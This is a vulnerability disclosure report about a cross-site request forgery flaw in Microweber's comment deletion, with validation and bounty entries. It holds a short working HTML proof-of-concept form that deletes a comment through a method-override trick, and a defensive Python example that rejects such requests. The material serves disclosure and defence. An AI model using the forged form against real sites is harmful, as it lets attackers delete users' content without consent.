Cross-Site Request Forgery (CSRF) in microweber/microweber

Reported on Oct 22nd 2021

Hello Microweber team

I found a CSRF on deleting the comments:


  <!-- PoC.html: the form has no method attribute, so the browser submits it via GET;
       the hidden _method=POST field asks the framework to treat it as a POST. -->
  <script>history.pushState('', '', '/')</script>
  <form action="">
    <input type="hidden" name="id" value="1" />
    <input type="hidden" name="action" value="delete" />
    <input type="hidden" name="&#95;method" value="POST" />
    <input type="submit" value="Submit request" />
  </form>

After you run this PoC.html, you can see that the comment with id 1 will be deleted.
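The forged form above works only because the delete endpoint accepts a cross-site request that carries no proof it came from the site's own page, and because a GET can be promoted to a POST through the `_method` field. The following is an added example (not Microweber's code, nor the fix in 2cdf57) of a delete-comment handler with the checks that reject such a request: the method override is honoured only on a real POST, the Origin header must match the site, and a session-bound CSRF token is required. `Request`, `SITE_ORIGIN`, the session id and the comment store are constructed for the demo.

```python
import hmac
import hashlib
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

@dataclass
class Request:
    method: str                   # HTTP verb the browser actually used
    params: Dict[str, str]        # form fields (query string for GET, body for POST)
    origin: Optional[str] = None  # Origin header, if the browser sent one

SITE_ORIGIN = "https://site.example"   # assumed site origin (placeholder)
SECRET_KEY = secrets.token_bytes(32)   # server-side key; rotated per deployment

def csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session_id), unforgeable cross-site."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def effective_method(req: Request) -> str:
    """Honour _method only on a genuine POST; a GET is never upgraded."""
    if req.method == "POST":
        return req.params.get("_method", "POST").upper()
    return req.method

def delete_comment(req: Request, session_id: str, comments: Dict[int, str]) -> Tuple[int, str]:
    """Delete endpoint with the checks the forged form does not satisfy."""
    if effective_method(req) != "POST":
        return 405, "method not allowed"
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(session_id)):
        return 403, "missing or invalid CSRF token"
    cid = req.params.get("id", "")
    if not cid.isdigit() or comments.pop(int(cid), None) is None:
        return 404, "no such comment"
    return 200, "deleted comment " + cid

def demo() -> Tuple[int, int, int]:
    comments = {1: "first", 2: "second"}      # constructed comment store
    session = "sess-abc123"                   # constructed session id
    # 1. The PoC: no method attribute, so GET, with _method=POST in the query string.
    forged = Request("GET", {"id": "1", "action": "delete", "_method": "POST"}, "https://evil.example")
    s1, _ = delete_comment(forged, session, comments)
    # 2. A real cross-site POST, still without the session-bound token.
    forged_post = Request("POST", {"id": "1", "action": "delete"}, "https://evil.example")
    s2, _ = delete_comment(forged_post, session, comments)
    # 3. A same-site form that carries the token: the only one that deletes.
    legit = Request("POST", {"id": "1", "csrf_token": csrf_token(session)}, SITE_ORIGIN)
    s3, _ = delete_comment(legit, session, comments)
    return s1, s2, s3
```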

We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2cdf57 a year ago
Peter Ivanov has been awarded the fix bounty
manage.php#L1-L11 has been validated
Model.php#L1-L63 has been validated
functions.php#L1-L200 has been validated
admin.php#L1-L18 has been validated
Api.php#L1-L241 has been validated
view.php#L1-L57 has been validated
Controller.php#L1-L32 has been validated